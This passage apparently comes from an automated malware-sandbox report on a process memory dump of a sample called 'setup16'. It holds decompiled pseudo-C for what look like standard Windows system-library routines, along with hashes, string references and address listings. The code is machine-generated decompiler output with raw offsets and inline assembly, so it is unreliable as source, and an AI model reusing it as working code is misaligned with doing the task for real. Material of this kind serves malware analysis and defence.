                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: Actx
                                                                                                                                                                                                        • API String ID: 0-89312691
                                                                                                                                                                                                        • Opcode ID: 2527fe3191791214a1df722b0707f264e8dc7d95b760207845b7fa7551eca6b7
                                                                                                                                                                                                        • Instruction ID: e84cea565a0dd3bbc87dd95896ae81e6f9ae3af1812c939837c94997fa3ce2b1
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2527fe3191791214a1df722b0707f264e8dc7d95b760207845b7fa7551eca6b7
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5F119335304A02BBE7264E1F8490736729AEBC5724F25493BE865CB399F672F8408380
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 04A78DF1 Relevance: 1.3, Strings: 1, Instructions: 45COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 71%
                                                                                                                                                                                                        			E04A78DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				void* _t41;

				_t40 = __esi;
				_t39 = __edi;
				_t38 = __edx;
				_t35 = __ecx;
				_t34 = __ebx;
				_push(0x74);
				_push(0x4aa0d50);
				E04A1D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
					E04A55720(0x65, 0, "Critical error detected %lx\n", _t35);
					if( *((intOrPtr*)(_t41 + 8)) != 0) {
						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
						asm("int3");
						 *(_t41 - 4) = 0xfffffffe;
					}
				}
				 *(_t41 - 4) = 1;
				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
				 *((intOrPtr*)(_t41 - 0x64)) = L04A1DEF0;
				 *((intOrPtr*)(_t41 - 0x60)) = 1;
				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
				_push(_t41 - 0x70);
				L04A1DEF0(1, _t38);
				 *(_t41 - 4) = 0xfffffffe;
				return E04A1D130(_t34, _t39, _t40);
			}





                                                                                                                                                                                                        0x04a78df1
                                                                                                                                                                                                        0x04a78df1
                                                                                                                                                                                                        0x04a78df1
                                                                                                                                                                                                        0x04a78df1
                                                                                                                                                                                                        0x04a78df1
                                                                                                                                                                                                        0x04a78df1
                                                                                                                                                                                                        0x04a78df3
                                                                                                                                                                                                        0x04a78df8
                                                                                                                                                                                                        0x04a78dfd
                                                                                                                                                                                                        0x04a78e00
                                                                                                                                                                                                        0x04a78e0e
                                                                                                                                                                                                        0x04a78e2a
                                                                                                                                                                                                        0x04a78e36
                                                                                                                                                                                                        0x04a78e38
                                                                                                                                                                                                        0x04a78e3c
                                                                                                                                                                                                        0x04a78e46
                                                                                                                                                                                                        0x04a78e46
                                                                                                                                                                                                        0x04a78e36
                                                                                                                                                                                                        0x04a78e50
                                                                                                                                                                                                        0x04a78e56
                                                                                                                                                                                                        0x04a78e59
                                                                                                                                                                                                        0x04a78e5c
                                                                                                                                                                                                        0x04a78e60
                                                                                                                                                                                                        0x04a78e67
                                                                                                                                                                                                        0x04a78e6d
                                                                                                                                                                                                        0x04a78e73
                                                                                                                                                                                                        0x04a78e74
                                                                                                                                                                                                        0x04a78eb1
                                                                                                                                                                                                        0x04a78ebd

                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • Critical error detected %lx, xrefs: 04A78E21
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: Critical error detected %lx
                                                                                                                                                                                                        • API String ID: 0-802127002
                                                                                                                                                                                                        • Opcode ID: f7899b04f42736c5e12d324d0f83910ce28acd782c3d9a5541e35e4cfb1fe5c5
                                                                                                                                                                                                        • Instruction ID: f57868eba65e65b74480d5265c455255947e1d846b173dc077ded3e6a39ab3a5
                                                                                                                                                                                                        • Opcode Fuzzy Hash: f7899b04f42736c5e12d324d0f83910ce28acd782c3d9a5541e35e4cfb1fe5c5
                                                                                                                                                                                                        • Instruction Fuzzy Hash: C7116DB1D15348EBEF25DFA48A097DDBBB0BB04715F24425DE469AB291D3386601CF14
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 04A5FF10 Relevance: 1.3, Strings: 1, Instructions: 44COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 04A5FF60
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                                                                                                                                                                                        • API String ID: 0-1911121157
                                                                                                                                                                                                        • Opcode ID: d502af9a918fcd04bc6ac5dc5e2b618a31a5db8da799403428e5af81d2e67616
                                                                                                                                                                                                        • Instruction ID: 08589b2542228cc942728afaa80908194f70f45d307ca51f51cf8da250d33c01
                                                                                                                                                                                                        • Opcode Fuzzy Hash: d502af9a918fcd04bc6ac5dc5e2b618a31a5db8da799403428e5af81d2e67616
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7011C071950244EFEB12DF50CA48F98BBB2FF49718F148454F9096BAB1C739BA44CBA0
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 04A95BA5 Relevance: .6, Instructions: 592COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 88%
                                                                                                                                                                                                        			E04A95BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t296;
				signed char _t298;
				signed int _t301;
				signed int _t306;
				signed int _t310;
				signed char _t311;
				intOrPtr _t312;
				signed int _t313;
				void* _t327;
				signed int _t328;
				intOrPtr _t329;
				intOrPtr _t333;
				signed char _t334;
				signed int _t336;
				void* _t339;
				signed int _t340;
				signed int _t356;
				signed int _t362;
				short _t367;
				short _t368;
				short _t373;
				signed int _t380;
				void* _t382;
				short _t385;
				signed short _t392;
				signed char _t393;
				signed int _t395;
				signed char _t397;
				signed int _t398;
				signed short _t402;
				void* _t406;
				signed int _t412;
				signed char _t414;
				signed short _t416;
				signed int _t421;
				signed char _t427;
				intOrPtr _t434;
				signed char _t435;
				signed int _t436;
				signed int _t442;
				signed int _t446;
				signed int _t447;
				signed int _t451;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				intOrPtr _t456;
				intOrPtr* _t457;
				short _t458;
				signed short _t462;
				signed int _t469;
				intOrPtr* _t474;
				signed int _t475;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				short _t485;
				signed int _t491;
				signed int* _t494;
				signed int _t498;
				signed int _t505;
				intOrPtr _t506;
				signed short _t508;
				signed int _t511;
				void* _t517;
				signed int _t519;
				signed int _t522;
				void* _t523;
				signed int _t524;
				void* _t528;
				signed int _t529;

				_push(0xd4);
				_push(0x4aa1178);
				E04A1D0E8(__ebx, __edi, __esi);
				_t494 = __edx;
				 *(_t528 - 0xcc) = __edx;
				_t511 = __ecx;
				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
				 *(_t528 - 0xbc) = __ecx;
				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
				_t434 =  *((intOrPtr*)(_t528 + 0x24));
				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
				_t427 = 0;
				 *(_t528 - 0x74) = 0;
				 *(_t528 - 0x9c) = 0;
				 *(_t528 - 0x84) = 0;
				 *(_t528 - 0xac) = 0;
				 *(_t528 - 0x88) = 0;
				 *(_t528 - 0xa8) = 0;
				 *((intOrPtr*)(_t434 + 0x40)) = 0;
				if( *(_t528 + 0x1c) <= 0x80) {
					__eflags =  *(__ecx + 0xc0) & 0x00000004;
					if(__eflags != 0) {
						_t421 = E04A94C56(0, __edx, __ecx, __eflags);
						__eflags = _t421;
						if(_t421 != 0) {
							 *((intOrPtr*)(_t528 - 4)) = 0;
							E04A0D000(0x410);
							 *(_t528 - 0x18) = _t529;
							 *(_t528 - 0x9c) = _t529;
							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
							E04A95542(_t528 - 0x9c, _t528 - 0x84);
						}
					}
					_t435 = _t427;
					 *(_t528 - 0xd0) = _t435;
					_t474 = _t511 + 0x65;
					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
					_t511 = 0x18;
					while(1) {
						 *(_t528 - 0xa0) = _t427;
						 *(_t528 - 0xbc) = _t427;
						 *(_t528 - 0x80) = _t427;
						 *(_t528 - 0x78) = 0x50;
						 *(_t528 - 0x79) = _t427;
						 *(_t528 - 0x7a) = _t427;
						 *(_t528 - 0x8c) = _t427;
						 *(_t528 - 0x98) = _t427;
						 *(_t528 - 0x90) = _t427;
						 *(_t528 - 0xb0) = _t427;
						 *(_t528 - 0xb8) = _t427;
						_t296 = 1 << _t435;
						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
						__eflags = _t436 & _t296;
						if((_t436 & _t296) != 0) {
							goto L92;
						}
						__eflags =  *((char*)(_t474 - 1));
						if( *((char*)(_t474 - 1)) == 0) {
							goto L92;
						}
						_t301 =  *_t474;
						__eflags = _t494[1] - _t301;
						if(_t494[1] <= _t301) {
							L10:
							__eflags =  *(_t474 - 5) & 0x00000040;
							if(( *(_t474 - 5) & 0x00000040) == 0) {
								L12:
								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
									goto L92;
								}
								_t442 =  *(_t474 - 0x11) & _t494[3];
								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
									goto L92;
								}
								__eflags = _t442 -  *(_t474 - 0x11);
								if(_t442 !=  *(_t474 - 0x11)) {
									goto L92;
								}
								L15:
								_t306 =  *(_t474 + 1) & 0x000000ff;
								 *(_t528 - 0xc0) = _t306;
								 *(_t528 - 0xa4) = _t306;
								__eflags =  *0x4ab60e8;
								if( *0x4ab60e8 != 0) {
									__eflags = _t306 - 0x40;
									if(_t306 < 0x40) {
										L20:
										asm("lock inc dword [eax]");
										_t310 =  *0x4ab60e8; // 0x0
										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
										__eflags = _t311 & 0x00000001;
										if((_t311 & 0x00000001) == 0) {
											 *(_t528 - 0xa0) = _t311;
											_t475 = _t427;
											 *(_t528 - 0x74) = _t427;
											__eflags = _t475;
											if(_t475 != 0) {
												L91:
												_t474 =  *((intOrPtr*)(_t528 - 0x94));
												goto L92;
											}
											asm("sbb edi, edi");
											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
											_t511 = _t498;
											_t312 =  *((intOrPtr*)(_t528 - 0x94));
											__eflags =  *(_t312 - 5) & 1;
											if(( *(_t312 - 5) & 1) != 0) {
												_push(_t528 - 0x98);
												_push(0x4c);
												_push(_t528 - 0x70);
												_push(1);
												_push(0xfffffffa);
												_t412 = E04A09710();
												_t475 = _t427;
												__eflags = _t412;
												if(_t412 >= 0) {
													_t414 =  *(_t528 - 0x98) - 8;
													 *(_t528 - 0x98) = _t414;
													_t416 = _t414 + 0x0000000f & 0x0000fff8;
													 *(_t528 - 0x8c) = _t416;
													 *(_t528 - 0x79) = 1;
													_t511 = (_t416 & 0x0000ffff) + _t498;
													__eflags = _t511;
												}
											}
											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
											__eflags = _t446 & 0x00000004;
											if((_t446 & 0x00000004) != 0) {
												__eflags =  *(_t528 - 0x9c);
												if( *(_t528 - 0x9c) != 0) {
													 *(_t528 - 0x7a) = 1;
													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
													__eflags = _t511;
												}
											}
											_t313 = 2;
											_t447 = _t446 & _t313;
											__eflags = _t447;
											 *(_t528 - 0xd4) = _t447;
											if(_t447 != 0) {
												_t406 = 0x10;
												_t511 = _t511 + _t406;
												__eflags = _t511;
											}
											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
											 *(_t528 - 0x88) = _t427;
											__eflags =  *(_t528 + 0x1c);
											if( *(_t528 + 0x1c) <= 0) {
												L45:
												__eflags =  *(_t528 - 0xb0);
												if( *(_t528 - 0xb0) != 0) {
													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
													__eflags = _t511;
												}
												__eflags = _t475;
												if(_t475 != 0) {
													asm("lock dec dword [ecx+edx*8+0x4]");
													goto L100;
												} else {
													_t494[3] = _t511;
													_t451 =  *(_t528 - 0xa0);
													_t427 = E04A06DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
													 *(_t528 - 0x88) = _t427;
													__eflags = _t427;
													if(_t427 == 0) {
														__eflags = _t511 - 0xfff8;
														if(_t511 <= 0xfff8) {
															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
															asm("sbb ecx, ecx");
															__eflags = (_t451 & 0x000000e2) + 8;
														}
														asm("lock dec dword [eax+edx*8+0x4]");
														L100:
														goto L101;
													}
													_t453 =  *(_t528 - 0xa0);
													 *_t494 = _t453;
													_t494[1] = _t427;
													_t494[2] =  *(_t528 - 0xbc);
													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
													 *_t427 =  *(_t453 + 0x24) | _t511;
													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x14);
													if( *(_t528 + 0x14) == 0) {
														__eflags =  *[fs:0x18] + 0xf50;
													}
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x18);
													if( *(_t528 + 0x18) == 0) {
														_t454 =  *(_t528 - 0x80);
														_t479 =  *(_t528 - 0x78);
														_t327 = 1;
														__eflags = 1;
													} else {
														_t146 = _t427 + 0x50; // 0x50
														_t454 = _t146;
														 *(_t528 - 0x80) = _t454;
														_t382 = 0x18;
														 *_t454 = _t382;
														 *((short*)(_t454 + 2)) = 1;
														_t385 = 0x10;
														 *((short*)(_t454 + 6)) = _t385;
														 *(_t454 + 4) = 0;
														asm("movsd");
														asm("movsd");
														asm("movsd");
														asm("movsd");
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = 0x68;
														 *(_t528 - 0x78) = _t479;
													}
													__eflags =  *(_t528 - 0x79) - _t327;
													if( *(_t528 - 0x79) == _t327) {
														_t524 = _t479 + _t427;
														_t508 =  *(_t528 - 0x8c);
														 *_t524 = _t508;
														_t373 = 2;
														 *((short*)(_t524 + 2)) = _t373;
														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
														 *((short*)(_t524 + 4)) = 0;
														_t167 = _t524 + 8; // 0x8
														E04A0F3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t380 =  *(_t528 - 0x80);
														__eflags = _t380;
														if(_t380 != 0) {
															_t173 = _t380 + 4;
															 *_t173 =  *(_t380 + 4) | 1;
															__eflags =  *_t173;
														}
														_t454 = _t524;
														 *(_t528 - 0x80) = _t454;
														_t327 = 1;
														__eflags = 1;
													}
													__eflags =  *(_t528 - 0xd4);
													if( *(_t528 - 0xd4) == 0) {
														_t505 =  *(_t528 - 0x80);
													} else {
														_t505 = _t479 + _t427;
														_t523 = 0x10;
														 *_t505 = _t523;
														_t367 = 3;
														 *((short*)(_t505 + 2)) = _t367;
														_t368 = 4;
														 *((short*)(_t505 + 6)) = _t368;
														 *(_t505 + 4) = 0;
														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = _t479 + _t523;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t454;
														if(_t454 != 0) {
															_t186 = _t454 + 4;
															 *_t186 =  *(_t454 + 4) | 1;
															__eflags =  *_t186;
														}
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0x7a) - _t327;
													if( *(_t528 - 0x7a) == _t327) {
														 *(_t528 - 0xd4) = _t479 + _t427;
														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
														E04A0F3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + _t522;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t199 = _t505 + 4;
															 *_t199 =  *(_t505 + 4) | 1;
															__eflags =  *_t199;
														}
														_t505 =  *(_t528 - 0xd4);
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0xa8);
													if( *(_t528 - 0xa8) != 0) {
														_t356 = _t479 + _t427;
														 *(_t528 - 0xd4) = _t356;
														_t462 =  *(_t528 - 0xac);
														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
														_t485 = 0xc;
														 *((short*)(_t356 + 2)) = _t485;
														 *(_t356 + 6) = _t462;
														 *((short*)(_t356 + 4)) = 0;
														_t211 = _t356 + 8; // 0x9
														E04A0F3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
														E04A0FA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0x18;
														_t427 =  *(_t528 - 0x88);
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t505 =  *(_t528 - 0xd4);
														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t362 =  *(_t528 - 0x80);
														__eflags = _t362;
														if(_t362 != 0) {
															_t222 = _t362 + 4;
															 *_t222 =  *(_t362 + 4) | 1;
															__eflags =  *_t222;
														}
													}
													__eflags =  *(_t528 - 0xb0);
													if( *(_t528 - 0xb0) != 0) {
														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
														_t458 = 0xb;
														 *((short*)(_t479 + _t427 + 2)) = _t458;
														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
														 *((short*)(_t427 + 4 + _t479)) = 0;
														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
														E04A0FA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t241 = _t505 + 4;
															 *_t241 =  *(_t505 + 4) | 1;
															__eflags =  *_t241;
														}
													}
													_t328 =  *(_t528 + 0x1c);
													__eflags = _t328;
													if(_t328 == 0) {
														L87:
														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
														_t455 =  *(_t528 - 0xdc);
														 *(_t427 + 0x14) = _t455;
														_t480 =  *(_t528 - 0xa0);
														_t517 = 3;
														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
															asm("rdtsc");
															 *(_t427 + 0x3c) = _t480;
														} else {
															 *(_t427 + 0x3c) = _t455;
														}
														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
														_t456 =  *[fs:0x18];
														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
														_t427 = 0;
														__eflags = 0;
														_t511 = 0x18;
														goto L91;
													} else {
														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
														__eflags = _t519;
														 *(_t528 - 0x8c) = _t328;
														do {
															_t506 =  *((intOrPtr*)(_t519 - 4));
															_t457 =  *((intOrPtr*)(_t519 - 0xc));
															 *(_t528 - 0xd4) =  *(_t519 - 8);
															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
															__eflags =  *(_t333 + 0x36) & 0x00004000;
															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
																_t334 =  *_t519;
															} else {
																_t334 = 0;
															}
															_t336 = _t334 & 0x000000ff;
															__eflags = _t336;
															_t427 =  *(_t528 - 0x88);
															if(_t336 == 0) {
																_t481 = _t479 + _t506;
																__eflags = _t481;
																 *(_t528 - 0x78) = _t481;
																E04A0F3E0(_t479 + _t427, _t457, _t506);
																_t529 = _t529 + 0xc;
															} else {
																_t340 = _t336 - 1;
																__eflags = _t340;
																if(_t340 == 0) {
																	E04A0F3E0( *(_t528 - 0xb8), _t457, _t506);
																	_t529 = _t529 + 0xc;
																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
																} else {
																	__eflags = _t340 == 0;
																	if(_t340 == 0) {
																		__eflags = _t506 - 8;
																		if(_t506 == 8) {
																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
																			 *(_t528 - 0xdc) =  *(_t457 + 4);
																		}
																	}
																}
															}
															_t339 = 0x10;
															_t519 = _t519 + _t339;
															_t263 = _t528 - 0x8c;
															 *_t263 =  *(_t528 - 0x8c) - 1;
															__eflags =  *_t263;
															_t479 =  *(_t528 - 0x78);
														} while ( *_t263 != 0);
														goto L87;
													}
												}
											} else {
												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
												 *(_t528 - 0xa2) = _t392;
												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
												__eflags = _t469;
												while(1) {
													 *(_t528 - 0xe4) = _t511;
													__eflags = _t392;
													_t393 = _t427;
													if(_t392 != 0) {
														_t393 =  *((intOrPtr*)(_t469 + 4));
													}
													_t395 = (_t393 & 0x000000ff) - _t427;
													__eflags = _t395;
													if(_t395 == 0) {
														_t511 = _t511 +  *_t469;
														__eflags = _t511;
													} else {
														_t398 = _t395 - 1;
														__eflags = _t398;
														if(_t398 == 0) {
															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
														} else {
															__eflags = _t398 == 1;
															if(_t398 == 1) {
																 *(_t528 - 0xa8) =  *(_t469 - 8);
																_t402 =  *_t469 & 0x0000ffff;
																 *(_t528 - 0xac) = _t402;
																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
															}
														}
													}
													__eflags = _t511 -  *(_t528 - 0xe4);
													if(_t511 <  *(_t528 - 0xe4)) {
														break;
													}
													_t397 =  *(_t528 - 0x88) + 1;
													 *(_t528 - 0x88) = _t397;
													_t469 = _t469 + 0x10;
													__eflags = _t397 -  *(_t528 + 0x1c);
													_t392 =  *(_t528 - 0xa2);
													if(_t397 <  *(_t528 + 0x1c)) {
														continue;
													}
													goto L45;
												}
												_t475 = 0x216;
												 *(_t528 - 0x74) = 0x216;
												goto L45;
											}
										} else {
											asm("lock dec dword [eax+ecx*8+0x4]");
											goto L16;
										}
									}
									_t491 = E04A94CAB(_t306, _t528 - 0xa4);
									 *(_t528 - 0x74) = _t491;
									__eflags = _t491;
									if(_t491 != 0) {
										goto L91;
									} else {
										_t474 =  *((intOrPtr*)(_t528 - 0x94));
										goto L20;
									}
								}
								L16:
								 *(_t528 - 0x74) = 0x1069;
								L93:
								_t298 =  *(_t528 - 0xd0) + 1;
								 *(_t528 - 0xd0) = _t298;
								_t474 = _t474 + _t511;
								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
								_t494 = 4;
								__eflags = _t298 - _t494;
								if(_t298 >= _t494) {
									goto L100;
								}
								_t494 =  *(_t528 - 0xcc);
								_t435 = _t298;
								continue;
							}
							__eflags = _t494[2] | _t494[3];
							if((_t494[2] | _t494[3]) == 0) {
								goto L15;
							}
							goto L12;
						}
						__eflags = _t301;
						if(_t301 != 0) {
							goto L92;
						}
						goto L10;
						L92:
						goto L93;
					}
				} else {
					_push(0x57);
					L101:
					return E04A1D130(_t427, _t494, _t511);
				}
			}










































































                                                                                                                                                                                                        0x04a95ba5
                                                                                                                                                                                                        0x04a95baa
                                                                                                                                                                                                        0x04a95baf
                                                                                                                                                                                                        0x04a95bb4
                                                                                                                                                                                                        0x04a95bb6
                                                                                                                                                                                                        0x04a95bbc
                                                                                                                                                                                                        0x04a95bbe
                                                                                                                                                                                                        0x04a95bc4
                                                                                                                                                                                                        0x04a95bcd
                                                                                                                                                                                                        0x04a95bd3
                                                                                                                                                                                                        0x04a95bd6
                                                                                                                                                                                                        0x04a95bdc
                                                                                                                                                                                                        0x04a95be0
                                                                                                                                                                                                        0x04a95be3
                                                                                                                                                                                                        0x04a95beb
                                                                                                                                                                                                        0x04a95bf2
                                                                                                                                                                                                        0x04a95bf8
                                                                                                                                                                                                        0x04a95bfe
                                                                                                                                                                                                        0x04a95c04
                                                                                                                                                                                                        0x04a95c0e
                                                                                                                                                                                                        0x04a95c18
                                                                                                                                                                                                        0x04a95c1f
                                                                                                                                                                                                        0x04a95c25
                                                                                                                                                                                                        0x04a95c2a
                                                                                                                                                                                                        0x04a95c2c
                                                                                                                                                                                                        0x04a95c32
                                                                                                                                                                                                        0x04a95c3a
                                                                                                                                                                                                        0x04a95c3f
                                                                                                                                                                                                        0x04a95c42
                                                                                                                                                                                                        0x04a95c48
                                                                                                                                                                                                        0x04a95c5b
                                                                                                                                                                                                        0x04a95c5b
                                                                                                                                                                                                        0x04a95c2c
                                                                                                                                                                                                        0x04a95cb7
                                                                                                                                                                                                        0x04a95cb9
                                                                                                                                                                                                        0x04a95cbf
                                                                                                                                                                                                        0x04a95cc2
                                                                                                                                                                                                        0x04a95cca
                                                                                                                                                                                                        0x04a95ccb
                                                                                                                                                                                                        0x04a95ccb
                                                                                                                                                                                                        0x04a95cd1
                                                                                                                                                                                                        0x04a95cd7
                                                                                                                                                                                                        0x04a95cda
                                                                                                                                                                                                        0x04a95ce1
                                                                                                                                                                                                        0x04a95ce4
                                                                                                                                                                                                        0x04a95ce7
                                                                                                                                                                                                        0x04a95ced
                                                                                                                                                                                                        0x04a95cf3
                                                                                                                                                                                                        0x04a95cf9
                                                                                                                                                                                                        0x04a95cff
                                                                                                                                                                                                        0x04a95d08
                                                                                                                                                                                                        0x04a95d0a
                                                                                                                                                                                                        0x04a95d0e
                                                                                                                                                                                                        0x04a95d10
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a95d16
                                                                                                                                                                                                        0x04a95d1a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a95d20
                                                                                                                                                                                                        0x04a95d22
                                                                                                                                                                                                        0x04a95d25
                                                                                                                                                                                                        0x04a95d2f
                                                                                                                                                                                                        0x04a95d2f
                                                                                                                                                                                                        0x04a95d33
                                                                                                                                                                                                        0x04a95d3d
                                                                                                                                                                                                        0x04a95d49
                                                                                                                                                                                                        0x04a95d4b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a95d5a
                                                                                                                                                                                                        0x04a95d5d
                                                                                                                                                                                                        0x04a95d60
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a95d66
